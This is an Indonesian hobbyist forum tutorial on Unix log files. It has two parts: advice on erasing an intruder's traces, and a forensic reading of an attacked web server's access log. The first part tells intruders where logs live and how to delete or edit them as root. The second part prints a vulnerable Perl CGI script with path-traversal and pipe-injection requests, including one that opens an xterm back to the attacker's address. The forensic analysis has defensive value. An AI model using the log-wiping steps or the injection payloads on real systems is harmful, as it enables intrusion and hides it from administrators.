Menghapus jejak meninggalkanmu
Hmmmm,..mo tanya, ini kaya judul lagunya band apa yach???
Upst,.tapi ada hubungannya loh lagu diatas sama masalah hacking pada
mesin *nix, loh..loh..loh..lagu sama hacking,dimana bunga hubungannya???
Okey deyh,daripada bunga dibilang size bajunya L alias Lebai , langsung ajah deyh di ulas dikit-dikit.
.log file ??? ini sebuah file yang berisi tentang catatan apapun yang
dilakukan oleh siapapun dalam sebuah mesin. Untuk bisa mengakses ini
yang dibutuhkan adalah anda sebagai root/SU. File ini bisa dibuka atau
diedit dengan cara menggunakan text editor dan hexa editor sesuai
dengan jenis/macamnya. Loh kok macamnya??? Emangnya ada berapa macam
yang sich log file itu???
Ini macem ato jenis dari dari file
log itu, tapi kalo ada kesalahan mohon maaf dan di koreksi yach
temen-temen,bunga masih belajar
1. .history: mencatat semua
hal yang dilakukan oleh user, biasanya tersimpan dalam directory user.
Sangat mudah dihapus ato di edit, asalkan kita sebagai SU statusnya.
2. acct ato pact: mencatat semua hal yang dilakukan oleh user, tetapi
tidak mencatat program yang dijalankan oleh user, ini hanya catatan
harian sebuah mesin, jadi ukuran file bisa bertambah besar setiap
harinya. Biasanya terletak pada /var/adm/savacct.
3. access_log:
mencatat access file pada www seperti: pemanggilan hostname, remote
login, waktu access dan perintah-perintah pada http, digunakan pada
NCSA httpd server. Biasanya berupa text biasa, sangat mudah diedit
hanya menggunakan text editor.
4. aculog: mencatat pemakaian modem.
5. lastlog: mencatat user yang login,baik yang masuk ato gagal login.
Didalemnya terekam IP address dari user tersebut.sangat mudah
dihapus,pake coomannd ajah lsg terhapus kok.
6. loginlog: mencatat
hanya user yang gagal login biasanya setelah 5 kali percobaan gagal
login baru tercatat. Bentuknya hanya file text bisa, jadi sangat mudah
dihapus ato diedit.
7. messages: mencatat hasil apapun yang
dikeluarkan oleh syslog. Bentuknya hanya file text bisa, jadi sangat
mudah dihapus ato diedit.
8. sulog: mencatat apapun yang dilakukan oleh su. Bentuknya hanya file text bisa, jadi sangat mudah dihapus ato diedit.
9. utmp: mencatat siapa saja yang sedang login ato berada dalam sebuah
mesin. Biasanya menggunakan command who untuk mengetahui penyusup yang
sedang asik-asikan didalam mesin. File ini berekstensi utmpx.
10. wtmp: mencatet user yang login menggunakan ftp,berekstensi wtmpx, dan menggunakan hexaeditor untuk mengeditnya.
11. vold.log: mencatat error pada mesin yang menggunakan media external,contoh cd room, floppy, dsb.
12. xferlog: mencatat penggunaan ftp (hampir sama spt wmtp).
13. syslog:
Setelah kita mengetahui sedikit tentang macam-macamnya lalu kita akan
mencoba telusuri lebih dalam lagi,.semua file diatas terangkum dalam
sebuah file yang dinamakan syslog. Syslog ini mempunyai daemon yang
berguna sebagai ?jantungnya? dinamakan syslogd. Sewaktu syslog ini
berjalan dia akan menuju file conf yang terletak pada /etc/syslog.conf
yang membaca dari tiga buah report yang dikeluarkan oleh:
a. /dev/klog(membaca kernel report)
b. /dev/log(membaca report program yang berjalan pada local mesin)
c. UDP port 514(membaca report program yang berjalan pada network)
So sedikit kita sudah mengetahui tentang file log ini,..tapi?dimanakah
file tersebut berada??? Untuk hal yang satu ini tempatnya abstrak alias
bisa dipindah-pindah, admin yang topcer biasanya menyembunyikan file
ini dalam brangkasnya,..hehehehehhe..gak mungkin lah Bunga, iya gak
mungkin dalam brangkas siy, tapi memang diumpetin serapat-rapatnya
serahasia hanya admin dan Tuhan yang mengetahuinya. Tapi jangan sedih
dulu, menurut pengalaman Bunga, Masih banyak admin yang teledor dengan
asumsi masih diparkirkan pada tempat defaultnya,?because secure is not
default?ntu kata hacker inggris, tapi Bunga lupa Nicknya .
Tempatnya file log dari pengalaman Bunga:
? /usr/adm
? /var/adm
? /var/log
Sekali lagi ini gak mutlak loh,.kalo mo jelas,datengin ajah adminnya
Tanya passnya,Tanya file lognya, terus minta ijin ajah sekalian pake
mesinnya,kalo yang ini halal 100%,.hehehehehehe,.becanda
Dah
ketemu file lognya tapi cara membersihkannya bagaimana yach???masnya
ambil kain basah lalu lap ajah monitornya, siapa tau bisa
bersih,.hehehehehehe,.becanda lagi ding
Caranya pake perintah rm
?rf, syntak: command [patch], contoh: rm ?rf /var/log/wmtp, ato juga
menggunakan text editor sepert vi / nano / pico, cukup hapus baris
datanya saja, kurang lebih sama seperti konfigurai dual boot lilo
Yach, sekarang kita lanjutkan lagi, tapi dah pada capek yach,.bikin
teh, kopi, or susu jangan lupa cemilannya yach, biar tambah
semangat,.GO..GO..GO..
Okey sekarang kita mencoba membedah
file log untuk mengetahui vulnerbilty pada mesin kita,.sebelumnya,
sekali lagi maafkan Bunga jika ada kesalahan, mas, om, mba, tante,
kakak, yang lebih senior dan jago Bunga minta ijin,.?satu guru satu
ilmu dilarang saling menggangu?,.hehehehehehehe,?
Berikut
ini contoh kasus pada
http://www.c**.co.id, Bunga pernah melakukan
forensic pada mesin servernya, web programernya menggunakan script CGI
Perl, Servernya diobrak-abrik oleh craker gila, tapi dia agak sembrono
dimana dia tidak menghapus track nya pada access_log,(untuk IP nya
disamarkan):
10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / HTTP/1.0? 200 3008
10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / A1.jpg HTTP/1.0? 200 3456
10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / V90.jpg HTTP/1.0? 200 6943
10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / RG7.jpg HTTP/1.0? 200 9854
Penjelasan: Attacker dengan no Ip 10.0.*.**, dia hanya melihat-lihat
web ini pada halaman utama dan kejadian ini dicatet pada jam 01:02:45.
10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / index.cgi?page=contact.shtml HTTP/1.0? 200 309
10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / NOW.jpg HTTP/1.0? 200 3456
10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / index.cgi?page=layanan.shtml HTTP/1.0? 200 309
10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / 9RG7.jpg HTTP/1.0? 200 9854
Penjelasan: Masih sulit apa maksudnya attacker dikarena dia masih melihat-lihat dan mencoba link pada web ini.
10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / cgi-bin/ HTTP/1.0? 403 272
Penjelasan: Attacker mulai beraksi, dia mencoba mengakses direktory
/cgi-bin/ dan hal hasil yang ditemukannya adalah 403, apa siy artinya
403??? forbiden cuy,.
10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / index.cgi HTTP/1.0? 200 3009
10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / index.cgi?page=index.cgi HTTP/1.0? 200 399
Penjelasan: Attacker melanjutkan serangannya lagi, sekarang dia
mengikuti pola link yang telah lihatnya. Peratama ia memasukan
http://www.c**.co.id/index.cgi lalu ia mencoba lagi mamasukan
http://www.c**.co.id/index.cgi?page=index.cgi. Nah dari sini si
attacker dapat melihat script index.cgi nya, dari mana ia melihatnya???
Yach dari browsernya lah,.scriptnya tampil di browser .
Kenapa ini bisa terjadi???
Attacker meneliti index.cgi menerima sebuah nama file sebagai seuatu
parameter dan memperlihatkan isi dari file tersebut. Disini attacker
menggunakan index.cgi itu sendiri untuk menampilkan source codenya.
Source code:
01: #! /usr/bin/perl
02: # perl script to display a page back as requested by the argument
03:
04: require ?../cgi-bin/cgi-lib.pl?;
05:
06: &ReadParse(*input);
07:
08: $namafile = $input{page};
09: if ($namafile eq ??) {
10: $namafile = ?main.html?;
11: }
12:
13: print &PrintHeader;
14:
15: $namafile = ? /usr/local/apache/htdocs/? . $namafile;
16: open(FILE, $namafile);
17: while(){
18: print $_;
19: }
20: close(file);
Sekarang kita ulas dan pelajari,.bugs nya terdapat pada validasi untuk
parameter-parameter yang akan dilewatkan ke script index.cgi. Filename
yang dilewatkan sebagai parameter dari url ditangkap sebagai sebuah
variabel $namafile pada baris 08, ditambahkan ke path absolut?
usr/local/apache/htdocs? pada baris 15, dan ditampilkan pada baris 16.
Berarti,...yups betul,.kita bisa dengan mudah mengambil file dari server web
10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0? 200 786
Penjelasan: Sekarang attacker mencoba mencari password,.Wow...
10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / index.cgi?page=|ls -la /
id
which xterm| HTTP/1.0? 200 1399
10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / index.cgi?page=|xterm display 10.0.*.**:0.0 &| HTTP/1.0? 200
Penjelasan: Rupanya ini attacker mengerti tentang unix dan perl,
sekarang dia tidak berusaha membuka file dikarenakan dia sekarang
menggunakan karakter pipa?|? diikuti dengan command-command pilihannya.
Dengan demikian, perl membuka kendali filenya yang dapat menerima
output standar hasil dari command-command yang dituliskan pada
parameter filename. Disini attacker meminta 2 buah request:
http://www.c**.co.id/index.cgi?page=|ls ... ich xterm|
disini jelas attacker sebenernya mengeksekusi coomand ls ?la/ , id,
which xterm,.apa yang didapet dari attacker mengeksekusi coomand
tersebut???
Yang didapet adalah: menampilkan daftar file pada
direktory root dengan perintah ls ?la/, mendapatkan id user yang
efektif pada proses eksekusi index.cgi dengan perintah id, dan yang
terkahir mendapatkan path xtrem biner dari perintah ?which xterm?.
Request yang kedua:
http://www.c**.co.id/index.cgi?page=|xt ... *:0.0 &|
attacker menjalankan command ?xterm ? display 10.0.*.**:0.0&?ini
berarti dia menjalankan window xterm pada mesin attacker. Lalu apa yang
dilakukan???yach udah masukin user, trus pass, masuk deyh,. .
Dari sini kita dapet mengetahui bugs pada mesin kita dengan melihat log yang ditinggalkan oleh attacker.
Yach,.segitu ajah dari bunga tentang menghapus jejak dan buka-bukaan file log tuk dapet vulnerbilty sebuah mesin.
Semoga ajah tulisan ini bermanfaat untuk kemajuan IT security
Indonesia.Mohon dikoreksi lagi para senior ato orang-orang yang jago
dalam bidang ini,dikarenakan Bunga masih belajar,.
Makacih buat semua orang yang ada didunia dan temen-temen semua di forum,.
Salam hangat
Bungaputrilanacita